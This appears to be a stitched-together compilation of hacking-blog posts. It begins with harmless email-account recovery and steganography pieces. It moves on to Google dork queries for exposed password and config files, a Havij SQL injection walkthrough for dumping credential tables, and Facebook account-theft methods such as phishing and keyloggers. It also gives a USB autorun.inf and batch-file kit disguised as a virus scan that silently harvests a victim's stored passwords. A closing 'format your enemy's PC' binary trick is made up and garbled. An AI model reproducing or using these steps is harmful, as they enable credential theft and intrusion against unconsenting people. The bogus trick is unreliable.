What to Do When Your Email Account is Hacked?

How to Recover Hacked Email Accounts?

It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures to get back your hacked email account.

For Gmail:

It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.

Step -1: Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link

Gmail Password Reset Link

If you cannot find success from the Step-1 then proceed to Step-2.

Step-2: Many times the hacker will change the secret question and secondary email address right after the account is compromised. This is the reason for the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like

1. Email addresses of up to five frequently emailed contacts
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…

You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out this form. This is your last chance! The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link

Account Recovery Form

For Yahoo and Hotmail:

Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option.

To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.

I hope this post will help you recover the lost account.

How to Hide Data in Image, Audio & Video Files: Steganography

Ever wondered to know how to hide secret messages in images, audio and video files? Well, in this post I will take you through a concept called steganography using which, it is possible to hide your secret information in image files, songs or any other file of your choice. At the end of this post, you can also download free stegnographic tools and start hiding your data.

What is Steganography?

Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it. Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected.

The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity.

What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.

Eventhough steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Roumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.

How do Steganography Tools Work?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.

There are many steganography tools available online but only a few are able to work flawlessly. I did not find any tool that worked perfectly on both small and large data. However I have managed to develop my own tool that can work perfectly on all types of files and all size of data. The tool is called “Stego Magic“. You can download it from the following link.

Download Stego Magic

Download StegoMagic.zip

The zip file contains two versions of Stego Magic: One for encrypting the text messages and the other for encrypting binary files. StegoMagic_TXT can be used to hide text messages in other files such as an image or a sound file. StegoMagic_BIN can be used to hide one binary file in another such as an executable file inside an image or an image inside a video file.

With Stego Magic, there is no limitation on the size and type of the file that you are intending to hide. For example, you can hide a video of size 1 GB in an image of size 1 MB or hide an executable file inside a WORD document. The tool is pretty straightforward to use and requires no special understanding of the concept.

At the end of the encryption process, a secret decryption key will be generated and the same is required during the decryption process.

How to Use Stego Magic?

Suppose you want to hide a text message inside a JPG file:

1. Place the JPG and the text file (.txt) in the same folder as that of StegoMagic_TXT.exe

2. Run StegoMagic_TXT.exe and follow the screen instructions to embed the text message inside the JPG image.

3. Note down the secret decryption key.

Now you can send this image to your friend via email. To decrypt the hidden message, your friend should load this JPG file onto the Stego Magic tool and use the secret decryption key.

I hope you enjoy this post . For queries and feedback, please pass your comments .

How to Find Sql Vulnerable web sites with Injections point with Real Sql Tool

what is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you!

Here is the search function and you can see it is returning a vulnerable URL

The search is complete and there were 3 vulnerable URLs found!

This is the save button making a .txt file of all the working links

Showing the contextual menu in the results box

Filename: REAL Sql - V0.3.rar

File description: REAL Sql - V0.3

File size: 1.00 MB

Download Real sql Tool From Here

Hope you like this Post and it will help to you...

Google Hacking Codes

Application security vendor Fortify reported in 2006 that 20 percent to 30 percent of the attacks it recorded as part of a six-month study came as a result of some form of search engine hacking.


Google is not particularly enamored by the efforts of some of its users to use its index for malicious gain.


"As part of Google's efforts to index all of the information online we find that on occasion malicious executable files become available to users through Google Web search," Megan Quinn, a Google spokeswoman, told internetnews.com. "We deplore these malicious efforts to violate our users' security.


"When possible, we endeavor to shield our users from these executable files," Quinn added. "However we always encourage users to keep their security software up-to-date to ensure the safest Web surfing experience."


But what kind of Codes are available I hear you all ask;


Well here's just a few of them I've found out about. . .

Interesting Searches…
* Source http://www.i-hacked.com/content/view/23/42/
* intitle:"Index of" passwords modified
* allinurl:auth_user_file.txt
* "access denied for user" "using password“
* "A syntax error has occurred" filetype:ihtml
* allinurl: admin mdb
* "ORA-00921: unexpected end of SQL command“
* inurl:passlist.txt
* "Index of /backup“
* "Chatologica MetaSearch" "stack tracking:"
* inurl:passwd.txt
…and this one is just priceless…
* “login: *” “password= *” filetype:xls


Listings of what you want
* change the word after the parent directory to what you want
* "parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
* "parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
* "parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
* "parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
* "parent directory " Name of Singer or album” -xxx -html -htm -php -shtml -opendivx -md5 -md5sums


Music (*this is already posted in another thread)
* You only need add the name of the song/artist/singer.
* Example: intitle:index.of mp3 jackson


CD Images
* inurl:microsoft filetype:iso
* You can change the string to whatever you want, ex. Microsoft to Adobe, .iso to .zip etc…


Passwords
* "# -FrontPage-" inurl:service.pwd FrontPage passwords.. very nice clean search results listing !!


* "AutoCreate=TRUE password=*" This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/


Passwords in the URL
* "http://*:*@www" domainname This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the domain name without the .com or .net
* "http://*:*@www" gamespy or http://*:*@www”gamespy
* Another way is by just typing "http://bob:bob@www"


IRC Passwords
* "sets mode: +k" This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
* eggdrop filetype:user user These are eggdrop config files. Avoiding a full-blown discussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.


Access Database Passwords
* allinurl: admin mdb Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!


DCForum Passwords
* allinurl:auth_user_file.txt DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks.


MySQL Passwords
* intitle:"Index of" config.php
* This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.


The ETC Directory
* intitle:index.of.etc
* This search gets you access to the etc directory, where many, many, many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!


Passwords in backup files
*filetype:bak inurl:"htaccess|passwd|shadow|htusers
* " This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extension of a file on a web server can have ugly consequences.


Serial Numbers
* Let's pretend you need a serial number for Windows XP Pro.
* In the Google search bar type in just like this - "Windows XP Professional" 94FBR
* the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' sites (usually pornography) that trick you.
* or if you want to find the serial for WinZip 8.1 - "WinZip 8.1" 94FBR


These are only a sample of some of the fun things you can do with the wrong kind of Google search. Such strings return very random results, and are of very little use for targeted attacks. But for random hacking of peoples Frontpage password's, it's priceless.


* inurl:(service | authors | administrators | users) ext:pwd "# -FrontPage-"

SQL Injection Tutorial With Havij Tool

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.


One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

Warning - This article is only for education purposes, By reading this article you agree that My   

                  Blog is not responsible in any way for any kind of damage caused by the information provided in this article.

Supported Databases With Havij

• MsSQL 2000/2005 with error.
• MsSQL 2000/2005 no error union based
• MySQL union based
• MySQL Blind
• MySQL error based
• MySQL time based
• Oracle union based
• MsAccess union based
• Sybase (ASE)

Demonstration

Now i will Show you step by step the process of SQL injection.

Step1: To Find SQL injection Vulnerability in site and insert the ' or ''

           After the url of website like http://www.target.com/index.asp?id=123'

Step2: Now if the site give any Error in webpage than this site is valnerable for SQL injection.Than just       

            copy this Site Url from address bar of your browser and put it in a Havij as show below.(Without '      

            or ''  like http://www.target.com/index.asp?id=123).

Step3: Now click on the Analyse button as shown below.

Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:

Step4: Now click on the Tables button and then click Get Tables button from below column as shown 

            below:

Step5: Now select the Tables with sensitive information and click Get Columns button.After that select the 

            Username and Password Column to get the Username and Password and click on the Get Table  

            button.

Step6: Now select the Tables name that you want to show and click on Getdata Button and wait some 

            time... it Display Data of that Table..

Download Link For Havij:-----Download Havij from Here

Warning - This article is only for education purposes, By reading this article you agree that My 

                  Blog is not responsible in any way for any kind of damage caused by the information provided in this article.

4 ways on How to hack facebook password

Today i thought to uncover all the methods used to hack facebook password,


I will cover 4 methods over here:

1. Facebook Phishing

2. Keylogging

3. Social engineering

4. Primary email address hack

Facebook phishing:I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. 


Keylogging:This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password.


Social engineering:This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on orkut and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


Primary email address hack:If Facebook hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this Facebook hacker can easily hack your Facebook password using "Forgot password" trick. He will simply ask Facebook to send password reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will be hacked !!!




So, always remember to protect your Facebook primary email address and try to keep unknown or useless mail id as your primary email addressSo far, i found these Facebook hacking methods as best and working ways to hack facebook account passwords. I never encourage hacking Facebook or any email account,,I just wanna make you aware about Facebook dangers online. I will appreciate your effort if you mention any other Facebook hacking method.

Hack Stored Passwords in PC Using USB Pen Drive

Hacking passwords or any information using USB pendrive. Learn how to steal information or passwords of your friends or enemies using pendrives...

Today I will show you how to hack Passwords using USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Webbrowserpassview: WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 8.0), Mozilla Firefox (All Versions), Google Chrome, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser.

Download Above Tools From  Here

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB 

    Pendrive.

     ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe,webbrowserpassview.exe and       

     passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

3.New Text Document.txt to autorun.inf

4.Now copy the autorun.inf file onto your USB pendrive.

5.Create another Notepad and write the following text onto it.

        start mspass.exe /stext mspass.txt

        start mailpv.exe /stext mailpv.txt

        start iepv.exe /stext iepv.txt

        start pspv.exe /stext pspv.txt

         start webbrowserpassview.exe /stext webpass.txt

         start passwordfox.exe /stext passwordfox.txt

6.save the Notepad and rename it from New Text Document.txt to launch.bat

7.Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

8. Insert the pendrive in victim pc and the autorun window will pop-up. (This is because, we have 

    created an autorun pendrive). if pop-up window might not open then you should manually  

    click on launch.bat file to run the all tools silently..

9. In the pop-up window, select the first option (Perform a Virus Scan).

10. Now all the password recovery tools will silently get executed in the background (This process 

      takes hardly a few seconds). The passwords get stored in the .TXT files.

11. Remove the pendrive and plug in it in your pc now you can see the .TXT files in usb drive just      

      open that and you can see the password.....

This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Nokia secret codes

These codes for the Nokia series of phones provide some interesting information for users, they also unlock some hidden functions. These codes are often reffered to as "Nokia Secret Codes" or "Nokia Hacks". Use the codes at your own risk, not all Nokia phones support all codes, I have tried to split them into these groups.

These 3 codes work on 90% of Nokia phones;


*#06#   n/a   Display the IMEI (Standard GSM command, works on all phones)
*#0000#   n/a   Display the firmware version and date
*#92702689#   *#war0anty#   Here you can view the S/N and the IMEI as well as the life timer (newer models). The date the    phone left the factory and the date it was purchased. If your phone has been repaired the date of the repair is also visible. You will need to turn the phone off to exit this menu. Newer phones simply require you to press ok.


The following codes are specific to older series 40 phones;  (Entering the following codes will restart the phone)


*4720#   (*hra0#)   Cctivates Half Rate, Half Rate is 5.6kbit/s and uses half the bandwidth at the cost of call quality. Network operators often activate half rate on overloaded towers during peak times to save costs.
#4720#   (#hra0#)   Deactivates Half Rate
*3370#   (*efr0#)   Activates Enhanced Full Rate, EFT attempts to match wire quality. The calls are 12.2kbit/s and are not supported by all operators. It is compatibale with the hightest AMR mode.
#3370#   (#efr0#)   Deactivates Enhanced Full Rate
*#746085685#   (*#sim0clock#)   Display the SIM clock status


The following codes are phone specific or phase related;


*#7220#   (*#pca0#)   Activate the GPRS PCCCH support (Packet Common Control Channel)
*#7230#   (*#pcd0#)   Deactivate the GPRS PCCCH support
*#7760#    (*#ssn0#)   Display the manufacturing serial number


This only works on the 3310 and 3330;


*#67705646#   (*#opr0logo#)   Clear the operator logo, the logo will be reset to the default network operator logo.


The following codes work on newer series 40 & series 60/80 phones;


*#2820#   (*#bta0#)   Display the Bluetooth MAC address (Phone must have a built in bluetooth adapter)
*#7370925538#   (*#res0wallet#)   Reset the mobile wallet (Phone must have the mobile wallet feature)
*#7370#   (*#res0#)   Soft-format the memory (Symbian)
*#7780#   (*#rst0#)   Reset to factory defaults, confirmation required (also known has a Hard-format), all phone contents will be wiped clean including contacts and smses if they are stored on the phone.

CODE THAT FORMATS UR ENEMEY'S COMPUTER.........PLZZ DON'T TRY DIS IN UR PC

Paste the below code in a notepad file:

0100101100011111001001010101010101

Save the file as
'whateveryouwish.exe'
When you open it, the hard
disk formats!!!
You can keep this file in
your school's computer in a
far-off folder.
At first
rename it and send a
shortcut to desktop. Now
hide the original file. Change the icon of the
shortcut to that of My
computer and rename it as
'My Computer' and delete
the original 'My computer'. When someone tries to
open it....BOOOM!!!


If you are unable to format
C drive when the victim's
PC is running, then you can
use the following line of
code:

0110011001101111011100100110110101
100000011000110011101001011100
0010000000101111010100010010111101


It's extremely cool!!! How about making the
computer not to boot in
the first place??
Then use this code:

0110010001100101011011000010000000
101111010100110010111101010001
0010000001100011001110100101110001
101111011101000010111001101001
0110111001101001

You will be astounded at
the result when someone
tries to restart the PC!

NOTE : THIS IS JUST FOR EDUCATIONAL PURPOSE......
==========================================